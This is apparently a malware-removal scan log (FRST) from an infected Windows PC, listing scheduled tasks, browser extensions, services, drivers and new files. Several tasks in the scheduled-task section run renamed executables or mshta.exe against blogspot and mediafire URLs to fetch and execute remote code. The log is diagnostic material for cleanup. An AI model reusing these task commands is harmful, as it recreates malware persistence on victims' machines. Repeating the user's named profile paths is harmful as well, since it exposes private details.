System32\Tasks\Lenovo\ImController\TimeBasedEvents\50dc28da-d8a5-4075-a449-a2c3de303016
=> C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [84240
2022-01-28] (Lenovo -> Lenovo Group Ltd.)
Task: {058B7C2A-04F0-45DE-9627-9C6E7CCE7BA8} -
System32\Tasks\asdsdasdjikindasddeyu => "C:\ProgramData\milon.com" [Argument =
"https://mobnew1htmback.blogspot.com/atom.xml"]
Task: {075916D6-E5F7-40C7-8182-1C67EF084131} -
System32\Tasks\Lenovo\BatteryGauge\BatteryGaugeMaintenance =>
C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe
[145480 2021-09-09] (Lenovo -> Lenovo Group Ltd.)
Task: {196BBB2B-2A02-4B61-957D-CE1F0834B582} - System32\Tasks\AdobeGCInvoker-1.0
=> C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe
[3426560 2021-11-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {1F090919-B54C-4586-8E7E-66D4AE17D748} -
System32\Tasks\{5F6010C8-60E5-41f3-BF5B-C3AF5DBE12D4} => Powershell -noexit
-command "&{$carbProgramDataPath = $env:ProgramData + '\Carbonite\Carbonite
Backup\';$upgradeExe = 'CarboniteUpgrade.exe';$upgradeFullPath =
$carbProgramDataPath + $upgradeExe;$logFile =
'CarboniteUpgrade.log';$logFileFullPath = $carbProgramDataPath +
$logFile;$psversion = [string]$psversio (the data entry has 1818 more
characters).
Task: {252A0B0A-F3F9-4E27-A155-660322B33141} -
System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor =>
C:\WINDOWS\system32\ImController.InfInstaller.exe [64256 2022-01-28] (Lenovo ->
Lenovo Group Ltd.)
Task: {26BE80AD-71D6-4CBB-9666-22D13C0B475F} -
System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe
/NOUACCHECK
Task: {27302AB8-5990-4AC3-BEB6-CF5627D88D26} - System32\Tasks\calendersw =>
"C:\ProgramData\ddond.com" [Argument =
"https://www.mediafire.com/file/b1rg1ah1ulmvcmq/00Back.htm/file"]
Task: {28751D4C-8F0A-4952-AD0D-509447043A15} -
System32\Tasks\Lenovo\ImController\TimeBasedEvents\f84a8bd1-7f5d-4570-8e71-9e98dfc43665
=> C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [84240
2022-01-28] (Lenovo -> Lenovo Group Ltd.)
Task: {31432971-0BAB-4E0B-9780-F37F894796D5} - System32\Tasks\ModifyLinkUpdate
=> C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [10387848 2016-09-03]
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {3A66BFAC-D97D-478E-BD3F-4E9D90CADB49} - System32\Tasks\QBScheduledReport
=> C:\Program Files (x86)\Common
Files\Intuit\QuickBooks\ScheduledReports\ScheduledReports.Scheduler.exe [382672
2021-10-11] (Intuit, Inc. -> Intuit Inc.)
Task: {4EBD398E-9E3B-4A48-8FF6-85D216BCAB3C} -
\Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {512DE987-41AB-47F5-828A-B2B7D00CB4E3} -
System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files
(x86)\Google\Update\GoogleUpdate.exe [153752 2017-03-11] (Google Inc -> Google
Inc.)
Task: {51F7470A-5D84-4B13-8B32-A0E3E689309C} - System32\Tasks\AMDInstallLauncher
=> C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [10387848 2016-09-03]
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {53FC2A34-956B-4691-8FCB-DA0D66138CBD} -
System32\Tasks\asdaddddasdadsddasdeyu => "C:\Windows\System32\mshta.exe"
"hxxps://mainnewstart1mob.blogspot.com/atom.xml"
Task: {5CB3741F-35C5-4387-84E8-9F4EB62C970C} - System32\Tasks\Adobe Acrobat
Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
[1564424 2021-11-18] (Adobe Inc. -> Adobe Inc.)
Task: {67871706-20E3-4C80-B9F4-B9D020657012} -
System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache
Maintenance => C:\ProgramData\Microsoft\Windows
Defender\Platform\4.18.2202.4-0\MpCmdRun.exe [979568 2022-03-14] (Microsoft
Windows Publisher -> Microsoft Corporation)
Task: {715BA06C-2606-49AB-947F-B90E72E784E2} -
System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled
Scan => C:\ProgramData\Microsoft\Windows
Defender\Platform\4.18.2202.4-0\MpCmdRun.exe [979568 2022-03-14] (Microsoft
Windows Publisher -> Microsoft Corporation)
Task: {744E7720-08E6-4ACA-A028-1DB55159B099} - System32\Tasks\StartDVR =>
C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [69304 2019-12-04] (Advanced
Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {7CB88DC5-BA16-4D87-8687-B57D2FC10F78} - System32\Tasks\AMDLinkUpdate =>
C:\Program Files\AMD\CIM\BIN64\InstallManagerApp.exe [10387848 2016-09-03]
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {817A5D7F-FD6B-4FF2-AA73-5AE36AA55EF7} -
System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification
=> C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MpCmdRun.exe
[979568 2022-03-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {90566F24-977B-44B9-871D-6957883E5F09} -
System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask
=> %windir%\System32\reg.exe add
hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f
/reg:32
Task: {96B1F419-C6B7-4BB5-B79D-94F18E72E438} - System32\Tasks\PDVDServ14 Task =>
C:\Program Files (x86)\CyberLink\PowerDVD14\PDVD14Serv.exe [88344 2016-07-14]
(CyberLink Corp. -> CyberLink Corp.)
Task: {ABCA3FA9-E8CD-4ED1-B06B-76DC9743BD25} -
System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup =>
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2202.4-0\MpCmdRun.exe
[979568 2022-03-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C4EDA42F-FEE3-4676-B5DB-157EC6956B30} - System32\Tasks\StartCN =>
C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2019-12-04] (Advanced Micro
Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {C5D910ED-8F29-4F79-BAFE-EF66025662A3} -
System32\Tasks\Lenovo\Vantage\Lenovo.Vantage.ServiceMaintainance =>
%systemroot%\system32\sc.exe start LenovoVantageService
Task: {C897E049-5067-41C4-8F4C-CB5C6B419D54} - System32\Tasks\microWord =>
"C:\ProgramData\milon.com" [Argument =
"https://mobnew1htmback.blogspot.com/atom.xml"]
Task: {C93B1543-F255-4089-8829-80F7E1E7D67B} -
System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance =>
"%windir%\system32\sc.exe" START ImControllerService
Task: {D755020B-7DA0-44F0-B23E-530FFFDB95B3} - System32\Tasks\Lenovo\Lenovo
Service Bridge\S-1-5-21-1394640484-365018484-2708498470-1001 => C:\Users\Karin
Hostetler\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSBUpdater.exe
[88408 2021-12-29] (Lenovo (Beijing) Limited -> Lenovo Group Limited)
Task: {EEFE07B3-E757-44AE-98D9-D1C700964CB5} -
System32\Tasks\Lenovo\ImController\TimeBasedEvents\1f4ef107-f801-4464-9830-d9022cee0b91
=> C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [84240
2022-01-28] (Lenovo -> Lenovo Group Ltd.)
Task: {F62BAAF1-3CF7-40D9-9D31-43EAA39A692C} - System32\Tasks\StartCNBM =>
C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2019-12-04] (Advanced Micro
Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {FAA2F9C0-B1F9-43B8-A07F-477CD7F90A6A} - System32\Tasks\App Explorer =>
C:\Users\Karin Hostetler\AppData\Local\Host App
Service\Engine\HostAppServiceUpdater.exe [7822896 2021-12-15] (SweetLabs Inc. ->
SweetLabs, Inc) <==== ATTENTION
Task: {FC5F4341-17F5-495E-82F4-08E1247DE73D} -
System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files
(x86)\Google\Update\GoogleUpdate.exe [153752 2017-03-11] (Google Inc -> Google
Inc.)
Task: {FD27E5B1-7BCB-444D-95EB-D5C585ECAB4F} -
System32\Tasks\Lenovo\ImController\TimeBasedEvents\5f627a14-d684-44f1-a6ff-ddf187f39d2e
=> C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [84240
2022-01-28] (Lenovo -> Lenovo Group Ltd.)
(If an entry is included in the fixlist, the task (.job) file will be moved. The
file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be
removed or restored to default.)
Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [121704
2011-08-30] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [132968
2011-08-30] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{a6e97a0e-0da7-4572-8df0-a43884305abc}: [DhcpNameServer]
192.168.1.1
Tcpip\..\Interfaces\{e7fffc76-4e10-4a5b-982e-8e8b939e69bf}: [DhcpNameServer]
192.168.1.1
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
Edge:
=======
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 =>
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill
[not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 =>
C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer
[not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824
=>
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools
[not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 =>
C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI
[not found]
Edge Profile: C:\Users\Karin Hostetler\AppData\Local\Microsoft\Edge\User
Data\Default [2022-03-22]
Edge HomePage: Default -> hxxps://www.google.com/
FireFox:
========
FF DefaultProfile: 5d5hv4c2.default-1581517371004
FF ProfilePath: C:\Users\Karin
Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004
[2021-09-26]
FF user.js: detected! => C:\Users\Karin
Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004\user.js
[2021-09-24]
FF DownloadDir: I:\CLIENTS
FF Extension: (ExpressVPN: VPN proxy for a better internet) - C:\Users\Karin
Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004\Extensions\firefox-addon@expressvpn.com.xpi
[2021-06-22]
FF Extension: (Glance Screen Sharing) - C:\Users\Karin
Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004\Extensions\glanceclient@glance.net.xpi
[2021-05-24]
FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\Karin
Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004\Extensions\jid1-ZAdIEUB7XOzOJw@jetpack.xpi
[2021-07-10]
FF Extension: (LastPass: Free Password Manager) - C:\Users\Karin
Hostetler\AppData\Roaming\Mozilla\Firefox\Profiles\5d5hv4c2.default-1581517371004\Extensions\support@lastpass.com.xpi
[2021-07-01]
FF HKLM\...\Firefox\Extensions: [sweb2pdfextension.3@nuance.com] - C:\Program
Files (x86)\Nuance\Power PDF 21\bin\SFirefoxExtn
FF Extension: (Nuance PDF Create) - C:\Program Files (x86)\Nuance\Power PDF
21\bin\SFirefoxExtn [2017-11-13] [Legacy]
FF HKLM\...\Firefox\Extensions: [web2pdfextension.17@acrobat.adobe.com] -
C:\Program Files (x86)\Adobe\Acrobat
DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF Extension: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Acrobat
DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
[2019-05-02]
FF HKLM-x32\...\Firefox\Extensions: [sweb2pdfextension.3@nuance.com] -
C:\Program Files (x86)\Nuance\Power PDF 21\bin\SFirefoxExtn
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files
(x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: (SmartPrintButton) - C:\Program Files
(x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] -
C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program
Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2017-12-16] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension.17@acrobat.adobe.com] -
C:\Program Files (x86)\Adobe\Acrobat
DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files
(x86)\LastPass\nplastpass64.dll [2017-03-11] (LastPass (Marvasol Inc) ->
LastPass)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft
Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation ->
Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe
Creative Cloud\Utils\npAdobeAAMDetect64.dll [2019-03-01] (Adobe Systems
Incorporated -> Adobe Systems)
FF Plugin-x32: @dymo.com/DymoLabelFramework -> C:\Program Files (x86)\DYMO\DYMO
Label Software\Framework\npDYMOLabelFramework.dll [2016-09-13] (Sanford, L.P. ->
Sanford L.P.)
FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files
(x86)\LastPass\nplastpass64.dll [2017-03-11] (LastPass (Marvasol Inc) ->
LastPass)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files
(x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft
Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat
DC\Acrobat\Air\nppdf32.dll [2022-03-02] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader
DC\Reader\AIR\nppdf32.dll [2022-03-02] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe
Creative Cloud\Utils\npAdobeAAMDetect32.dll [2019-03-01] (Adobe Systems
Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-1394640484-365018484-2708498470-1001:
@zoom.us/ZoomVideoPlugin -> C:\Users\Karin
Hostetler\AppData\Roaming\Zoom\bin\npzoomplugin.dll [2017-12-21] (Zoom Video
Communications, Inc. -> Zoom Video Communications, Inc.)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User
Data\Default [2022-03-23]
CHR DownloadDir: I:\CLIENTS
CHR Notifications: Default -> hxxps://calendar.google.com;
hxxps://console.gotoassist.com; hxxps://flashymass.com;
hxxps://mail.atlanticbb.net; hxxps://mail.breezeline.net;
hxxps://mayolocpa.liscio.me; hxxps://time4news.net; hxxps://www.creditkarma.com;
hxxps://www.reddit.com; hxxps://www.support.com; hxxps://www.truthfinder.com
CHR HomePage: Default -> hxxp://www.duckduckgo.com/
CHR StartupUrls: Default ->
"hxxps://calendar.google.com/calendar/u/0/r","hxxps://calendar.google.com/calendar/u/0/r/week?tab=mc"
CHR Extension: (Google Drive) - C:\Users\Karin
Hostetler\AppData\Local\Google\Chrome\User
Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-27]
CHR Extension: (YouTube) - C:\Users\Karin
Hostetler\AppData\Local\Google\Chrome\User
Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-03-11]
CHR Extension: (Logitech Smooth Scrolling) - C:\Users\Karin
Hostetler\AppData\Local\Google\Chrome\User
Data\Default\Extensions\dkpejdfnpdkhifgbancbammdijojoffk [2017-12-16]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Karin
Hostetler\AppData\Local\Google\Chrome\User
Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2022-03-22]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Karin
Hostetler\AppData\Local\Google\Chrome\User
Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-02-05]
CHR Extension: (Gmail) - C:\Users\Karin
Hostetler\AppData\Local\Google\Chrome\User
Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-27]
CHR Profile: C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User
Data\Guest Profile [2019-05-20]
CHR Profile: C:\Users\Karin Hostetler\AppData\Local\Google\Chrome\User
Data\System Profile [2019-05-20]
CHR HKLM\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry.
The file will not be moved unless listed separately.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
[169728 2021-11-18] (Adobe Inc. -> Adobe Inc.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop
Common\ElevationManager\AdobeUpdateService.exe [818128 2019-03-01] (Adobe
Systems Incorporated -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common
Files\Adobe\AdobeGCClient\AGMService.exe [3849472 2021-11-23] (Adobe Inc. ->
Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common
Files\Adobe\AdobeGCClient\AGSService.exe [3617024 2021-11-23] (Adobe Inc. ->
Adobe Systems, Incorporated)
R2 AUEPLauncher; C:\Program Files\AMD\Performance Profile
Client\AUEPLauncher.exe [43008 2019-12-04] (AMD) [File not signed]
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [270336 2012-07-13]
(Brother Industries, Ltd.) [File not signed]
R2 BTDevManager; C:\Program Files (x86)\REALTEK\Realtek Bluetooth Filter
ONLY\BTDevMgr.exe [125144 2016-02-15] (Realtek Semiconductor Corp -> Realtek
Semiconductor Corp.)
R2 DymoPnpService; C:\Program Files (x86)\DYMO\DYMO Label
Software\DymoPnpService.exe [33520 2016-09-13] (Sanford, L.P. -> Sanford, L.P.)
R2 ExpressVPNService; C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe
[437104 2021-03-22] (EXPRSVPN LLC -> ExpressVPN)
R2 GoToAssist Remote Support Customer; C:\Program Files (x86)\GoToAssist Remote
Support Customer\1702\g2ax_service.exe [614856 2021-05-15] (LogMeIn, Inc. ->
LogMeIn, Inc.)
S2 HP LaserJet Service; C:\Program Files
(x86)\HP\HPLaserJetService\HPLaserJetService.exe [136704 2009-06-24] (HP) [File
not signed]
R2 HPSIService; C:\WINDOWS\system32\HPSIsvc.exe [126880 2012-09-26]
(Hewlett-Packard Company -> HP)
R2 ImControllerService;
C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [84240
2022-01-28] (Lenovo -> Lenovo Group Ltd.)
R2 JME Keyboard; C:\Windows\jmesoft\Service.exe [32768 2011-08-17] () [File not
signed]
R2 LenovoVantageService; C:\Program Files
(x86)\Lenovo\VantageService\LenovoVantageService.exe [16648 2019-12-04] (Lenovo
-> Lenovo Group Ltd.)
R2 LiveStorageService; C:\Program
Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe [730160 2016-11-22]
(LENOVO -> Lenovo)
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
[145256 2011-08-02] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
R3 QBFCService; C:\Program Files (x86)\Common
Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2016-12-03] (Intuit
Inc.) [File not signed]
R2 QBWCMonitor; C:\Program Files (x86)\Common
Files\Intuit\QuickBooks\QBWebConnector3.0\Intuit.QBDT.Webconnector.QBWCMonitor.exe
[40784 2021-03-11] (Intuit, Inc. -> )
S3 QuickBooksDB26; C:\Program Files (x86)\Intuit\QuickBooks 2016\QBDBMgrN.exe
[127792 2016-11-25] (SAP -> Intuit, Inc.) [File not signed]
S3 QuickBooksDB27; C:\Program Files (x86)\Intuit\QuickBooks 2017\QBDBMgrN.exe
[134192 2019-12-15] (Intuit, Inc. -> SAP AG or an SAP affiliate company)
S3 QuickBooksDB28; C:\Program Files (x86)\Intuit\QuickBooks 2018\QBDBMgrN.exe
[127816 2020-12-09] (Intuit, Inc. -> SAP SE or an SAP affiliate company)
S3 QuickBooksDB29; C:\Program Files (x86)\Intuit\QuickBooks 2019\QBDBMgrN.exe
[127696 2021-09-17] (Intuit, Inc. -> SAP SE or an SAP affiliate company)
R3 QuickBooksDB30; C:\Program Files (x86)\Intuit\QuickBooks 2020\QBDBMgrN.exe
[127696 2021-09-16] (Intuit, Inc. -> SAP SE or an SAP affiliate company)
R3 QuickBooksDB31; C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions
21.0\QBDBMgrN.exe [127696 2021-10-11] (Intuit, Inc. -> SAP SE or an SAP
affiliate company)
R3 QuickBooksDB32; C:\Program Files\Intuit\QuickBooks Enterprise Solutions
22.0\QBDBMgrN.exe [139472 2021-08-19] (Intuit, Inc. -> SAP SE or an SAP
affiliate company)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows
Defender\Platform\4.18.2202.4-0\NisSrv.exe [3046608 2022-03-14] (Microsoft
Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows
Defender\Platform\4.18.2202.4-0\MsMpEng.exe [132504 2022-03-14] (Microsoft
Windows Publisher -> Microsoft Corporation)
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry.
The file will not be moved unless listed separately.)
S3 AndnetBus; C:\WINDOWS\System32\drivers\lgandnetbus64.sys [30208 2018-10-23]
(Microsoft Windows Hardware Compatibility Publisher -> LG Electronics Inc.)
S3 AndNetDiag; C:\WINDOWS\system32\DRIVERS\lgandnetdiag64.sys [30720 2018-10-16]
(Microsoft Windows Hardware Compatibility Publisher -> LG Electronics Inc.)
S3 ANDNetModem; C:\WINDOWS\system32\DRIVERS\lgandnetmodem64.sys [37376
2018-10-16] (Microsoft Windows Hardware Compatibility Publisher -> LG
Electronics Inc.)
R2 AODDriver4.3.0; C:\Program Files\AMD\Performance Profile
Client\amd64\AODDriver2.sys [60104 2015-02-19] (Advanced Micro Devices, Inc. ->
Advanced Micro Devices)
S3 BrSerIb; C:\WINDOWS\system32\DRIVERS\BrSerIb.sys [95344 2014-01-23] (Brother
Industries, Ltd. -> Brother Industries Ltd.)
S3 BrUsbSIb; C:\WINDOWS\system32\DRIVERS\BrUsbSIb.sys [21872 2014-01-23]
(Brother Industries, Ltd. -> Brother Industries Ltd.)
S3 expressvpnsplittunnel; C:\Program Files
(x86)\ExpressVPN\splittunnel\expressvpnsplittunnel.sys [37024 2021-03-22]
(ExprsVPN LLC -> ExpressVPN)
R3 expressvpnwintun; C:\WINDOWS\System32\drivers\expressvpn-wintun.sys [46824
2021-03-22] (Express VPN International Ltd. -> ExpressVPN)
S3 mvusbews; C:\WINDOWS\System32\Drivers\mvusbews.sys [20480 2012-09-26]
(Microsoft Windows Hardware Compatibility Publisher -> Marvell Semiconductor,
Inc.)
S3 tapexpressvpn; C:\WINDOWS\System32\drivers\tapexpressvpn.sys [52904
2021-03-22] (ExprsVPN LLC -> The OpenVPN Project)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49600 2022-03-14]
(Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R3 WDC_SAM; C:\WINDOWS\System32\drivers\wdcsam64.sys [26880 2015-11-12]
(WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [439544 2022-03-14]
(Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [90360 2022-03-14]
(Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry.
The file will not be moved unless listed separately.)
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-03-23 08:52 - 2022-03-23 08:54 - 000000000 ____D C:\FRST
2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\myciaB..tmp
2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\B.mvKwd.tmp
2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\Fkhvfuv.tmp
2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\IlxrjIs.tmp
2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.EipzDA.tmp
2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\FooEDIz.tmp
2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\ianksBp.tmp
2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\ljesr.e.tmp
2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\pAsnGil.tmp
2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\bvcozKc.tmp
2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\vacfsmG.tmp
2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\gelfCgB.tmp
2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.DmrCyx.tmp
2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\uhhsnBd.tmp
2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hdpl.A..tmp
2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\fhIqKrG.tmp
2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\h.dA..r.tmp
2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\pF.Fltn.tmp
2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\jKsc.Db.tmp
2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\ymybaBG.tmp
2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\abF.FyJ.tmp
2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\AfKprbo.tmp
2022-03-22 20:01 - 2022-03-22 20:01 - 000000000 ____D C:\Users\Karin
Hostetler\AppData\Local\CrashDumps
2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.gq.eEv.tmp
2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\Kjvon.z.tmp
2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hc.Ekso.tmp
